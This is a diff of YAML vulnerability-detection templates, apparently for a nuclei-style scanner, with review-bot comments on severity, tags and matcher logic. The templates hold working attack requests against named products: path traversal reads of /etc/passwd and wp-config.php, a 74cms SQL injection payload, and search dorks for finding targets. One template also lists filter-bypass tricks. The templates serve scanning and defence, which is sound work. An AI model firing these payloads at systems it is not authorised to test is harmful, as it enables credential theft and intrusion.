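Review bot: `severity: critical` in `poc/local_file_inclusion/oracle-fatwire-lfi.yaml` is not backed by anything left on the new side. The same hunk deletes the `classification` block, whose `cvss-score: 8.6` sits in the high band and matched the old `severity: high`. Either keep `severity: high`, or keep a classification that justifies the raise, so that alert routing keyed on severity is not inflated for a file-read finding.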
--- a/poc/local_file_inclusion/phpwiki-lfi-9567.yaml +++ b/poc/local_file_inclusion/phpwiki-lfi-9567.yaml @@ -1,23 +1,24 @@ id: phpwiki-lfi + info: - name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion + name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. - reference: - - https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + requests: - method: GET path: - "{{BaseURL}}/phpwiki/index.php/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/processmaker-lfi.yaml b/poc/local_file_inclusion/processmaker-lfi.yaml index 744b09bbf9..353a119874 100644 --- a/poc/local_file_inclusion/processmaker-lfi.yaml +++ b/poc/local_file_inclusion/processmaker-lfi.yaml @@ -1,12 +1,16 @@ id: processmaker-lfi info: - name: ProcessMaker <= 3.5.4 Directory Traversal + name: ProcessMaker <=3.5.4 - Local File Inclusion author: KrE80r severity: high - description: A vulnerability in ProcessMaker allows remote attackers to access arbitrary files and disclose their content. + description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/50229 - https://www.processmaker.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: processmaker,lfi requests: - raw: @@ -17,7 +21,9 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 
diff --git a/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml b/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml index d601167120..ead2351a23 100644 --- a/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml +++ b/poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml @@ -1,25 +1,17 @@ id: ruijie-networks-lfi - info: - name: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion + name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI author: pikpikcu severity: high - description: Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. - reference: - - https://exploit-db.com/exploits/48755 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. + reference: https://exploit-db.com/exploits/48755 tags: ruijie,lfi - requests: - method: GET path: - "{{BaseURL}}/download.do?file=../../../../config.text" matchers-condition: and matchers: - - type: word words: - 'filename="config.text"' @@ -30,9 +22,6 @@ requests: - "version S29_RGOS 11.4" part: body condition: and - - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml b/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml index 77d96f4a9f..a58df73c46 100644 --- a/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml +++ b/poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml 
@@ -1,27 +1,25 @@ id: simple-image-manipulator-lfi + info: - name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion + name: Simple Image Manipulator v1.0 - Remote file download author: dhiyaneshDK severity: high - description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/sl-studio-lfi-10320.yaml b/poc/local_file_inclusion/sl-studio-lfi-10320.yaml index 90dd6e278e..9679b24436 100644 --- a/poc/local_file_inclusion/sl-studio-lfi-10320.yaml +++ b/poc/local_file_inclusion/sl-studio-lfi-10320.yaml @@ -1,15 +1,10 @@ id: sl-studio-lfi info: - name: Webbdesign SL-Studio - Local File Inclusion + name: Webbdesign SL-Studio Directory Traversal author: 0x_Akoko severity: high - description: Webbdesign SL-Studio is vulnerable to local file inclusion. reference: - https://cxsecurity.com/issue/WLB-2018110187 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 metadata: google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' tags: slstudio,lfi 
@@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml b/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml index 4e865626ce..88c4402fbb 100644 --- a/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml +++ b/poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml @@ -1,23 +1,22 @@ id: sofneta-mecdream-pacs-lfi + info: - name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal author: 0x_akoko severity: high - description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion. + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal reference: - https://www.exploit-db.com/exploits/45347 - https://www.softneta.com/products/meddream-pacs-server/downloads.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 metadata: google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login tags: sofneta,lfi + requests: - method: GET path: - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + matchers: - type: word part: body @@ -26,5 +25,3 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/squirrelmail-lfi.yaml b/poc/local_file_inclusion/squirrelmail-lfi.yaml index cb9ac19bdd..cd19073867 100644 --- a/poc/local_file_inclusion/squirrelmail-lfi.yaml +++ b/poc/local_file_inclusion/squirrelmail-lfi.yaml 
@@ -1,9 +1,15 @@ id: squirrelmail-lfi info: - name: SquirrelMail 1.2.11 Local File Inclusion + name: SquirrelMail 1.2.11 - Local File Inclusion author: dhiyaneshDk severity: high - reference: https://www.exploit-db.com/exploits/22793 + description: SquirrelMail 1.2.11 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/22793 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: lfi,squirrelmail requests: - method: GET @@ -19,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/thinkcmf-lfi.yaml b/poc/local_file_inclusion/thinkcmf-lfi.yaml index bc1c7aba5e..4c4122ed1e 100644 --- a/poc/local_file_inclusion/thinkcmf-lfi.yaml +++ b/poc/local_file_inclusion/thinkcmf-lfi.yaml 
@@ -1,26 +1,33 @@ -id: thinkcmf-lfi-3 - +id: thinkcmf-lfi info: - name: ThinkCMF LFI + name: ThinkCMF - Local File Inclusion author: pikpikcu severity: high - reference: https://www.freebuf.com/vuls/217586.html + description: ThinkCMF is vulnerable to local file inclusion. + reference: + - https://www.freebuf.com/vuls/217586.html + metadata: + win-payload: ../../../../../../../../../../../../../../../../windows/win.ini + unix-payload: ../../../../../../../../../../../../../../../../etc/passwd + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: thinkcmf,lfi - requests: - method: GET path: - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini" - + - "{{BaseURL}}/?a=display&templateFile=README.md" matchers-condition: and matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - "bit app support" - + - type: word + condition: and + words: + - "ThinkCMF" + - "## README" + - "## UPDATE" - type: status status: - 200 + +# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml b/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml index 6786157651..747c17bdeb 100644 --- a/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml +++ b/poc/local_file_inclusion/wp-javospot-lfi-11480.yaml @@ -1,4 +1,5 @@ id: wp-javospot-lfi + info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko @@ -9,10 +10,12 @@ info: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + matchers-condition: and matchers: - type: word 
@@ -21,6 +24,7 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 diff --git a/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml b/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml +++ b/poc/local_file_inclusion/wp-socialfit-xss-11582.yaml @@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml index 4362f3d8af..010102368f 100644 --- a/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml +++ b/poc/local_file_inclusion/wp-tutor-lfi-11599.yaml @@ -1,27 +1,17 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/local_file_inclusion/wp-vault-lfi(1).yaml b/poc/local_file_inclusion/wp-vault-lfi(1).yaml old mode 100644 new mode 100755 index 0bb54330d9..8869a324ad --- a/poc/local_file_inclusion/wp-vault-lfi(1).yaml 
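Review bot: `reference: |` in `poc/local_file_inclusion/wp-socialfit-xss-11582.yaml` turns the field into a literal block scalar, so it now holds the single string `- https://www.exploit-db.com/exploits/37481` instead of a one-item list. Use the plain key `reference:` followed by the `- https://…` item, as the old side did. Separately, this is a cross-site scripting check stored under `poc/local_file_inclusion/`, which will mislead anyone who selects checks by directory.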
+++ b/poc/local_file_inclusion/wp-vault-lfi(1).yaml @@ -1,24 +1,33 @@ id: wp-vault-local-file-inclusion - info: - name: WP Vault 0.8.6.6 – Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/40850 - tags: wp-plugin,wordpress,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 - matchers-condition: and - matchers: + WordPress Plugin Vault 0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml index f588029977..b03298d776 100644 --- a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml +++ b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml 
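Review bot: The rewritten `info` block in `poc/local_file_inclusion/wp-vault-lfi(1).yaml` has no `tags` and no `reference` any more, so tag-based selection (the old side carried `wp-plugin,wordpress,lfi`) will skip this check and a finding has no source to verify against. `severity` is raised from `high` to `critical` with no classification to support it. Items 4 and 5 of the new `remediation` text describe conditions under which a filter can be bypassed rather than a fix; they do not belong in a remediation field and should be removed. The mode change to `100755` marks a data file executable and should go back to `100644`.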
@@ -1,18 +1,14 @@ id: xerox-efi-lfi info: - name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion + name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure author: gy741 severity: high - description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php - https://packetstormsecurity.com/files/145570 - https://www.exploit-db.com/exploits/43398/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: iot,xerox,disclosure,lfi requests: @@ -29,5 +25,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml index 309317c0f8..160af2e5cc 100644 --- a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml +++ b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml 
@@ -1,33 +1,23 @@ id: yishaadmin-lfi - info: - name: yishaadmin - Local File Inclusion + name: yishaadmin path traversal author: Evan Rubinstein severity: high - description: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication. + description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication. reference: - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/ - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,yishaadmin - requests: - raw: - | GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/magento/magento-admin-panel-8693.yaml b/poc/magento/magento-admin-panel-8693.yaml index 430459bb83..ebf1bb1afe 100644 --- a/poc/magento/magento-admin-panel-8693.yaml +++ b/poc/magento/magento-admin-panel-8693.yaml @@ -4,9 +4,8 @@ info: author: TechbrunchFR severity: info description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access. - reference: - - https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html - tags: magento,panel + reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html + tags: magento requests: - method: GET path: 
diff --git a/poc/magento/magento-cacheleak-8696.yaml b/poc/magento/magento-cacheleak-8696.yaml index 87c5065a7e..6b43d14bf6 100644 --- a/poc/magento/magento-cacheleak-8696.yaml +++ b/poc/magento/magento-cacheleak-8696.yaml @@ -12,12 +12,11 @@ info: - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ - https://royduineveld.nl/magento-cacheleak-exploit/ metadata: - max-request: 1 verified: true shodan-query: http.component:"Magento" tags: magento -http: +requests: - method: GET path: - '{{BaseURL}}/var/resource_config.json' diff --git a/poc/magento/magento-config.yaml b/poc/magento/magento-config.yaml index abf80cc0fe..e9c31fe08f 100644 --- a/poc/magento/magento-config.yaml +++ b/poc/magento/magento-config.yaml @@ -4,25 +4,21 @@ info: author: geeknik severity: medium tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/app/etc/local.xml" - "{{BaseURL}}/store/app/etc/local.xml" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "text/xml" part: header - - type: word words: - "Magento" - part: body \ No newline at end of file + part: body diff --git a/poc/microsoft/74cms-sqli-8.yaml b/poc/microsoft/74cms-sqli-8.yaml index 64afb3631a..afd5c1aac4 100644 --- a/poc/microsoft/74cms-sqli-8.yaml +++ b/poc/microsoft/74cms-sqli-8.yaml @@ -1,4 +1,5 @@ id: CVE-2020-22210 + info: name: 74cms - ajax_officebuilding.php SQL Injection author: ritikchaddha @@ -13,16 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* + epss-score: 0.12933 metadata: + max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli + variables: num: "999999999" -requests: + +http: - method: GET path: - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body 
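Review bot: `poc/magento/magento-cacheleak-8696.yaml` goes back from `http:` to the legacy `requests:` key and drops `max-request: 1`, while the `poc/microsoft/74cms-sqli-8.yaml` hunk in the same commit moves the opposite way (`requests:` to `http:`, adding `max-request: 1`). Pick one schema for the repository; if the templates are meant for a current engine, keep `http:` and the `max-request` metadata here. `poc/nginx/nginx-module-vts-xss-9108.yaml` further down makes the same `http:` to `requests:` change.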
diff --git a/poc/microsoft/Arcms-json_newslist-sqli.yaml b/poc/microsoft/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/microsoft/BlueCMS_v1-adjs-sqli.yaml b/poc/microsoft/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/microsoft/IDOR-vuln-params.yaml b/poc/microsoft/IDOR-vuln-params.yaml index aac2423d09..60d26b06fd 100644 --- a/poc/microsoft/IDOR-vuln-params.yaml +++ b/poc/microsoft/IDOR-vuln-params.yaml @@ -1,16 +1,16 @@ -id: idor-vuln-params - -info: - name: detect possible idor parameters - author: mohammed ayadi - severity: info - tags: idor,file,gf - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(\\?|\\&|\\/)(([a-z0-9]+(-|_)){0,1})(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report)(=|\\/)([0-9]+\\/){0,1}" +id: idor-vuln-params + +info: + name: detect possible idor parameters + author: ayadim + severity: info + tags: file,bbh,bbh-idor,bbh-check1 + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)(\\?|\\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report|username)((=)|(\\/[0-9]+\\/?))" diff --git a/poc/microsoft/JEEWMS-fileRead.yaml b/poc/microsoft/JEEWMS-fileRead.yaml index fee7448e04..0e02876cd7 100644 --- a/poc/microsoft/JEEWMS-fileRead.yaml +++ b/poc/microsoft/JEEWMS-fileRead.yaml @@ -1,12 +1,10 @@ id: JEEWMS-fileRead - info: name: JEEWMS 系统 showOrDownByurl.do 文件 down 参数本地文件包含漏洞(CNVD-2020-61972) author: Str1am severity: high reference: https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/JEEWMS%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md tags: JEEWMS,fileRead - requests: - method: GET path: diff --git a/poc/microsoft/aims-password-mgmt-client.yaml b/poc/microsoft/aims-password-mgmt-client.yaml index a178296f3f..c6f768a5c9 100644 --- a/poc/microsoft/aims-password-mgmt-client.yaml 
+++ b/poc/microsoft/aims-password-mgmt-client.yaml @@ -3,8 +3,16 @@ id: aims-password-mgmt-client info: name: Aims Password Management Client Detect author: iamthefrogy + description: An Aims Password management client was detected. severity: info tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,3 +23,5 @@ requests: - type: word words: - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/microsoft/aims-password-portal-222.yaml b/poc/microsoft/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/poc/microsoft/aims-password-portal-222.yaml +++ b/poc/microsoft/aims-password-portal-222.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/poc/microsoft/bems-api-lfi.yaml b/poc/microsoft/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/microsoft/bems-api-lfi.yaml +++ b/poc/microsoft/bems-api-lfi.yaml 
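Review bot: The added `cve-id:` in `poc/microsoft/aims-password-mgmt-client.yaml` has no value, so it loads as null; for a panel detection with `severity: info` the key should simply be dropped rather than left bare. `cwe-id: CWE-200` together with `cvss-score: 0.0` also labels a login-page fingerprint as an information-exposure weakness, which is worth confirming before reports are built from this field. The added `reference` and `classification` are placed after `tags`, unlike the other templates in this commit; keeping `tags` last would make the files easier to compare.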
@@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/microsoft/chamilo-lms-xss.yaml b/poc/microsoft/chamilo-lms-xss.yaml index 197aece45e..ad8b95d717 100644 --- a/poc/microsoft/chamilo-lms-xss.yaml +++ b/poc/microsoft/chamilo-lms-xss.yaml 
@@ -1,8 +1,8 @@ -id: chamilo-lms-xss-1 +id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/poc/microsoft/cisco-systems-login.yaml b/poc/microsoft/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/poc/microsoft/cisco-systems-login.yaml +++ b/poc/microsoft/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '' part: body - - type: status status: - 200 - - type: word words: - 'Content-Type: text/html' - part: header \ No newline at end of file + part: header diff --git a/poc/netlify/netlify-takeover-9042.yaml b/poc/netlify/netlify-takeover-9042.yaml index 17ceeb0180..973635bbcd 100644 --- a/poc/netlify/netlify-takeover-9042.yaml +++ b/poc/netlify/netlify-takeover-9042.yaml @@ -1,11 +1,10 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: @@ -14,8 +13,8 @@ requests: matchers: - type: word words: - - "Not found - Request ID:" + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header 
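Review bot: In `poc/netlify/netlify-takeover-9042.yaml` the body matcher is loosened from `"Not found - Request ID:"` to `"Not Found"`, a string that many ordinary 404 pages contain, so a claimed Netlify site that merely lacks the probed path can now be reported as a takeover candidate. Keep the specific string, `- "Not found - Request ID:"`. The header matcher `"server: Netlify"` is case-sensitive unless `case-insensitive: true` is set, so it may also miss responses that send `Server: Netlify`. The `matchers-condition` line, if there is one, lies outside the hunk, so how the two matchers combine cannot be confirmed from here.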
diff --git a/poc/nginx/nginx-config.yaml b/poc/nginx/nginx-config.yaml index 9975df4454..ef568764c1 100644 --- a/poc/nginx/nginx-config.yaml +++ b/poc/nginx/nginx-config.yaml @@ -1,29 +1,21 @@ id: nginx-config - info: name: Nginx Config file disclosure - author: sheikhrishad,geeknik + author: sheikhrishad severity: info tags: config,exposure,nginx - requests: - method: GET path: - "{{BaseURL}}/nginx.conf" - matchers-condition: and matchers: - - type: word - words: - - "html>" - negative: true - type: word words: - "server" - "listen" - "server_name" condition: and - - type: status status: - 200 diff --git a/poc/nginx/nginx-module-vts-xss-9108.yaml b/poc/nginx/nginx-module-vts-xss-9108.yaml index 61c9ee43e6..4057382928 100644 --- a/poc/nginx/nginx-module-vts-xss-9108.yaml +++ b/poc/nginx/nginx-module-vts-xss-9108.yaml 
